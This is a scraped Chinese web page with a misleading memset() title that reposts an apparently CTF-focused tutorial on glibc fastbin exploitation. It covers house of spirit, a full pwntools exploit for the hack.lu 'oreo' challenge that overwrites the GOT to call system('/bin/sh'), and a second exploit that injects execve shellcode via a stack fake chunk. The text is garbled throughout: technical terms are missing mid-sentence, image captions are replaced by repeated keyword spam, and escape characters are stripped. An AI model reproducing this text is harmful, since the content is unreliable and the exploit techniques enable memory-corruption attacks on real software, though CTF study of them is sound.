memset()函数的用法_memset头文件_memset

本文为看雪论坛精华文章

看雪论坛作者ID:

大小:

32位:16-64字节 0x10-0x40

64位:32-128字节 0x20-0x80

chunk 的大小而不是申请的内存的大小(申请的内存加上 chunk 头)

是一个数组,相同大小的 chunk 放在一个数组元素指向的链表里面。

单向链表后进先出, 数组中每一个元素指向该链表的尾结点,尾结点在通过 fd 指针指向前一个节点。

例如:

free(ptr1);

free(ptr2);

最后那么是这样的 -> ptr2 -> ptr1。

空闲的 chunk 不会被合并,不会修改 chunk 头。

拿这个例子做一下实验:

#includevoid main(){    char *a1=malloc(0x10);    memset(a1,0x41,0x10);    char *a2=malloc(0x10);    memset(a2,0x42,0x10);    char *a3=malloc(0x10);    memset(a3,0x43,0x10);    char *a4=malloc(0x30);    memset(a4,0x44,0x30);    char *a5=malloc(0x30);    memset(a5,0x45,0x30);    printf("malloc done!n");    free(a1);    free(a2);    free(a3);    free(a4);    free(a5);    printf("free donen");}

memset_memset()函数的用法_memset头文件

可以看出链表来,后释放的 fd 指向上一个的,而不同大小的不会指向:

memset_memset()函数的用法_memset头文件

Free

wiki 上的描述,可以看到 的 fd 会指向 那么如果 是我们可控的那么就可以申请任意地址的 。

memset()函数的用法_memset_memset头文件

House Of

又是全新的知识 Orz。

在目标地址伪造 chunk,然后释放掉,从而达到分配指定地址的 chunk 的目的。

有一些条件:

fake chunk 的 位不能为 1,因为 free 时,如果是 mmap 的 chunk,会单独处理

fake chunk 地址需要对齐,

fake chunk 的 size 大小需要满足对应的 的需求,同时也得对齐

fake chunk 的 next chunk 的大小不能小于 2 * ,同时也不能大于av->

fake chunk 对应的 链表头部不能是该 fake chunk,即不能构成 free 的情况

#include #include  int main() {    malloc(1);     fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.n");    unsigned long long *a, *b;    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));     fprintf(stderr, "The first one:  %pn", &fake_chunks[0]);    fprintf(stderr, "The second one: %pn", &fake_chunks[4]);     fake_chunks[1] = 0x20;      // the size    fake_chunks[5] = 0x1234;    // nextsize     fake_chunks[2] = 0x4141414141414141LL;    fake_chunks[6] = 0x4141414141414141LL;     fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.n", &fake_chunks[0]);    a = &fake_chunks[2];     fprintf(stderr, "Freeing the overwritten pointer.n");    free(a);     fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!n", &fake_chunks[0], &fake_chunks[2]);    b = malloc(0x10);    fprintf(stderr, "malloc(0x10): %pn", b);    b[0] = 0x4242424242424242LL;}

通过构造 fake chunk,然后把它给释放掉,这样再次申请相同大小的 chunk 的时候就会匹配到这里。

house-of- 是一种通过堆的 fast bin 机制来辅助栈溢出的方法。

如果栈溢出的时候溢出的长度不能覆盖掉返回地址的但是却可以覆盖栈上面一个即将 free 的指针的话,我们可以把这个指针覆盖为栈上的某一个地址,并且把这个地址上伪造一个 chunk,free 之后再次 就可以申请到栈上面伪造的那一块,这时候就有可能改写返回地址了。

通过上面那个程序直观的看一下:

gcc -g .c

首先在程序的第 14 行下个断点b 14。

运行到这里可以看到 目前还没有被我们写入:

memset_memset头文件_memset()函数的用法

我们直接让他写完,再来看一下,已经构造出 fake chunk 了。

memset_memset头文件_memset()函数的用法

对 进行 free 之后:

memset()函数的用法_memset头文件_memset

可以看一下 现在已经是有了我们构造的那个 了:

memset头文件_memset_memset()函数的用法

接下来再次 一个相同大小的 chunk 就会把这里申请过去:

b = malloc(0x10);b[0] = 0x4242424242424242LL;

memset()函数的用法_memset_memset头文件

构造 chunk 的时候要注意绕过一些检查:

后面那三个特殊的标志位前两个必须都为 0,写 size 位的时候直接 0xN0就可以了,然后大小要注意符合 的大小,next chunk 的大小也要注意,必须大于 2*,小于 av->。

64位下:16< next chunk 的 size < 128

Alloc to Stack

通过修改 fd 指针,指向栈上,从而申请栈上的空间,进而控制返回地址。

Alloc

跟上一个的区别在于这个是往任何可写的地方去分配 chunk。

2014 hack.lu oreo

先随便申请两个看一下结构:

add('1'*20,'a'*20)add('2'*20,'b'*20)

可以看到申请的第二个上有一个指向第一个的指针:

memset()函数的用法_memset_memset头文件

那如果第 2 个的 name 再多写一点,就可以覆盖掉这个指针了。

name = 'a'*27 + elf.got['puts']

memset_memset头文件_memset()函数的用法

这时候再去 show 就能拿到 puts 的真实地址了,拿到之后就可以计算出 libc 的地址,进而拿到 和 '/bin/sh' 的地址。

接下来需要伪造一个 chunk,因为枪支的 chunk 大小是 0x40的,而那个计数的东西在 bss 段中 的位置,每 add 一个就会 +1,可以用来作为 fake chunk 的 size,只需要多申请几个就可以。

这时候可以同时把最后一个的指针改为 fake chunk 的地址( + 0x4)。

memset()函数的用法_memset头文件_memset

count=1while count<0x3f:  add('a' * 27 + p32(0), 'b')  count=count+1payload = 'a' * 27 + p32(0x0804a2a8)add(payload,25 * 'a')

这样 fake chunk 的 size 位就构造好了,同时最后一个 chunk 的指向了 fake chunk:

memset()函数的用法_memset_memset头文件

还需要绕过一些检测:对齐、fake chunk 的 size 的大小、next chunk 的 size 大小、标记位检查。

来看一下那个 Leave a 功能,他会往 指向的地方也就是 读取内容:

memset头文件_memset()函数的用法_memset

我么可以通过 Leave a 往那个地方去写来帮助 fake chunk 绕过检查,比如:

payload = p8(0)*0x20 + p32(0x40) + p32(0x100)payload = payload.ljust(52, 'b')payload += p32(0)payload = payload.ljust(128, 'c')leave(payload)

首先是 0x20 的占位留给 fake chunk,然后是 fake chunk 的 size,接下来是 next chunk 的 size。

此时内存布局:

memset头文件_memset_memset()函数的用法

释放的时候会把之前修改的指针指向的那个给释放掉memset,然后再去申请的时候就可以申请到伪造的那个 chunk。

然后通过把 的地方改成某个函数的 got 表项再通过 Leave a 功能往改掉的那个地址上写内容以此来覆盖 got 表项的内容:

payload = p32(elf.got['strlen']).ljust(20, 'a')add('b' * 20,payload)leave(p32(sys_addr) + ';/bin/shx00')

这里覆盖的是 的 got 表的内容为 的地址:

memset()函数的用法_memset头文件_memset

Leave a 功能里面调用了一个函数,其中有 。

相当于 (p32() + ";/bin/sh")。

memset头文件_memset()函数的用法_memset

exp:

from pwn import *context.log_level = 'debug'p=process('./oreo')elf=ELF('./oreo')libc = ELF('./libc.so.6') def cmd(choice):  p.sendline(str(choice))   def add(name,description):  cmd(1)  p.sendline(name)  p.sendline(description)   def show():  cmd(2)  p.recvuntil('===================================n') def order():  cmd(3)   def leave(notice):  cmd(4)  p.sendline(notice)   def stats():  cmd(5)   add('1'*20,'a'*20)name = 'a'*27 + p32(elf.got['puts'])add(name,'b'*20) show()p.recvuntil('===================================n')p.recvuntil('Description: ')puts_addr = u32(p.recvuntil('n', drop=True)[:4])print hex(puts_addr)libc_base = puts_addr - libc.symbols['puts']sys_addr = libc_base + libc.symbols['system']binsh_addr = libc_base + next(libc.search('/bin/sh')) count=1while count<0x3f:  add('a' * 27 + p32(0), 'b')  count=count+1 payload = 'a' * 27 + p32(0x0804a2a8)add(payload,25 * 'a')payload = p8(0)*0x20 + p32(0x40) + p32(0x100)payload = payload.ljust(52, 'b')payload += p32(0)payload = payload.ljust(128, 'c')leave(payload) order()p.recvuntil('Okay order submitted!n')payload = p32(elf.got['strlen']).ljust(20, 'a')add('b' * 20,payload) leave(p32(sys_addr) + ';/bin/shx00')p.interactive()

L-–

这里的 v2 是在 0x30 的位置,而 read 读入的时候可以读入 0x30,但是不会再末尾自己加上 x00,所以如果输满了可以把后面的 rbp 给泄露出来。

buf 在 rbp-0x40,dest 指针在 rbp-0x8,所以 buf 的最后八字节会把 dest 给覆盖掉:

memset()函数的用法_memset_memset头文件

在输入 id 的那里会把输入的 id 放到 rbp-0x38 那里:

memset头文件_memset_memset()函数的用法

首先通过 read 函数来泄露出来 rbp 中保存的地址:

shellcode = "x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x56x53x54x5fx6ax3bx58x31xd2x0fx05"payload = shellcode.ljust(46, 'a')payload += 'bb'p.send(payload)p.recvuntil('bb')leak_addr = p.recvuntil(', w')[:-3]leak_addr = u64(leak_addr.ljust(8,'x00'))fake_addr = leak_addr - 0x90shellcode_addr = leak_addr - 0x50

箭头指向的是 rbp,0xe0-0x90=0x50,所以 的地址是在泄漏的那个地址减 0x50 处。

memset_memset头文件_memset()函数的用法

因为是先输入 id 再输入 money,所以那个 id 是在 money 下面的,可以通过 id 来伪造下一个堆块的 size(在一个范围内就可以memset,不能小于 2 * ,同时也不能大于av->)。

p.recvuntil('id ~~?')p.sendline('48')

然后再输入 money 的时候伪造一个 chunk,并且覆盖掉 dest。

p.recvuntil('money~')payload = p64(0) * 5 + p64(0x41) payload = payload.ljust(0x38, 'x00') + p64(fake_addr) p.send(payload)

这是构造的 fake chunk:

memset_memset头文件_memset()函数的用法

emmm,要是再减去 0x8 就更好看了:

memset_memset头文件_memset()函数的用法

看一下栈上的结构,最上面是构造的 chunk,下面是 id(作为 next chunk size)然后是 以及之前泄露的地址:

先释放掉让伪造的 chunk 进入到 ,然后再申请就申请到了伪造的 chunk,这时候覆盖掉 rip 为 的地址就可以拿到 shell。

memset()函数的用法_memset头文件_memset

这里有点疑惑为啥会把那个伪造的 chunk 放到 ?还是没把程序的功能理顺,我们把 dest 给覆盖掉了,覆盖为了 fake chunk 的地址,然后 dest 放到了 ptr,后面 free 的时候是 free(ptr) 的。

memset()函数的用法_memset_memset头文件

memset()函数的用法_memset头文件_memset

exp:

from pwn import *p = process("./pwn")shellcode = "x31xf6x48xbbx2fx62x69x6ex2fx2fx73x68x56x53x54x5fx6ax3bx58x31xd2x0fx05"payload = shellcode.ljust(46, 'a')payload += 'bb'#len=0x30p.send(payload)p.recvuntil('bb')leak_addr = p.recvuntil(', w')[:-3]leak_addr = u64(leak_addr.ljust(8,'x00'))fake_addr = leak_addr - 0x90shell_addr = leak_addr - 0x50print 'shellcode addr:'+hex(shell_addr)print 'fake addr:'+hex(fake_addr)print 'leak addr:'+hex(leak_addr) p.recvuntil('id ~~?')p.sendline('48') p.recvuntil('money~')payload = p64(0) * 5 + p64(0x41) payload = payload.ljust(0x38, 'x00') + p64(fake_addr) p.send(payload) p.recvuntil('choice : ')p.sendline('2') p.recvuntil('choice : ')p.sendline('1')p.recvuntil('long?')p.sendline('48')p.recvuntil('n48n') payload = '0' * 0x18 + p64(shell_addr)payload = payload.ljust(48, 'x00')p.send(payload)p.recvuntil('choice : ')p.sendline('3')  p.interactive()


限时特惠:
本站持续每日更新海量各大内部创业课程,一年会员仅需要98元,全站资源免费下载
点击查看详情

站长微信:Jiucxh

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注